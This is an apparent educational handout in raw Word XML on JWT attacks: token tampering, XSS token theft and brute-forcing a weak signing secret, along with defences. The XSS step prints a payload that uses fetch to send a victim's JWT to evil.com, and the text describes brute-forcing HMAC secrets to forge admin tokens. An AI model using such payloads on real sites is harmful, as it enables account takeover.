        </w:rPr>
        <w:t xml:space="preserve">The payload is only Base64 encoded — so an attacker can decode it, change their role to "admin", re-encode it, and send it.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00875A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What the server sees: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The signature was calculated from the ORIGINAL payload. The new payload produces a completely different signature. Server immediately detects the mismatch and returns 401 Unauthorized.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875A" w:sz="4"/>
              <w:left w:val="single" w:color="00875A" w:sz="24"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="4"/>
              <w:right w:val="single" w:color="00875A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00875A"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅  Why This Attack Always Fails</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The signature is mathematically tied to the exact bytes of the payload.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Changing "user" to "admin" is enough to completely invalidate the signature.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Without the server's secret key, the attacker cannot create a new valid signature.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0022"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 2 — Token Theft via XSS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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click Tab 2 in the app: Token Theft (XSS).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click  ▶ Simulate Attack  — watch the 5 steps light up one by one.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Read each step carefully. This represents a real attack that happens on the web every day.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0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">👤  Victim logs in</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">User logs in to a vulnerable website. Their JWT is stored in localStorage: localStorage.setItem("jwt", token)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">😈  Attacker finds an XSS vulnerability</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">The website allows users to post comments without sanitising the input. Attacker posts a malicious comment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">💉  Malicious script is injected</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker's comment contains: &lt;script&gt;fetch("https://evil.com?t=" + localStorage.getItem("jwt"))&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">📡  Script runs in victim's browser</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">When any other user views the page, the script runs. It reads the JWT from their localStorage and sends it to the attacker's server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="640"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0D1B3E"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FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8720"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:left w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:bottom w:val="single" w:color="C5CBDA" w:sz="4"/>
              <w:right w:val="single" w:color="C5CBDA" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E8EDF8" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="30" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D1B3E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">🤖  Attacker impersonates the victim</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="3C4460"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker now has a valid JWT. They send it to the server in an Authorization header. Server thinks it is the real user. Full access granted.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0022" w:sz="4"/>
              <w:left w:val="single" w:color="CC0022" w:sz="24"/>
              <w:bottom w:val="single" w:color="CC0022" w:sz="4"/>
              <w:right w:val="single" w:color="CC0022" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0022"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  If a JWT is Stolen — There is No Easy Fix</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">A stolen JWT is valid until it expires. If a 30-day token is stolen, the attacker has 30 days of access.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">You cannot 'log out' a JWT the way you can delete a session — unless you maintain a blocklist (which adds back statefulness).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">This is why short expiry times and secure storage are critical.</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875A" w:sz="4"/>
              <w:left w:val="single" w:color="00875A" w:sz="20"/>
              <w:bottom w:val="single" w:color="00875A" w:sz="4"/>
              <w:right w:val="single" w:color="00875A" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00875A"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">How to Defend Against XSS Token Theft</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Do NOT store JWT in localStorage or sessionStorage — JavaScript can read these.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Store JWT in httpOnly cookies — JavaScript CANNOT read httpOnly cookies.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement a Content Security Policy (CSP) to restrict which scripts can run.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Sanitise ALL user inputs before displaying them — prevent injection in the first place.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0022"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack 3 — Weak Secret Key (Brute Force)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6CC" w:sz="4"/>
              <w:left w:val="single" w:color="0066CC" w:sz="24"/>
              <w:bottom w:val="single" w:color="0066CC" w:sz="4"/>
              <w:right w:val="single" w:color="0066CC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EAF4FF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A3A6E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">👉  DO THIS IN THE APP</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click Tab 3 in the app: Weak Secret.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Click  ▶ Start Brute Force  — watch the log fill up with attempts.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">When it finds "secret" — read what it does next (creates a forged admin token!).</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">This takes seconds. In real life, attackers use millions of words per second.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0022"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">What happens: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">If the server uses a weak secret like "secret" or "password123", an attacker can try common words, compute HMAC-SHA256(header.payload, word) for each, and check if the result matches the token's signature. When it matches — they found the secret key.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CC0022"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1A1D2E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">With the secret key, they can sign ANY payload they want. They create a new token with admin role, valid for 10 years, and the server accepts it as genuine.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0022" w:sz="4"/>
              <w:left w:val="single" w:color="CC0022" w:sz="24"/>
              <w:bottom w:val="single" w:color="CC0022" w:sz="4"/>
              <w:right w:val="single" w:color="CC0022" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDECEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="80" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="CC0022"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠️  Secret Key Requirements</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
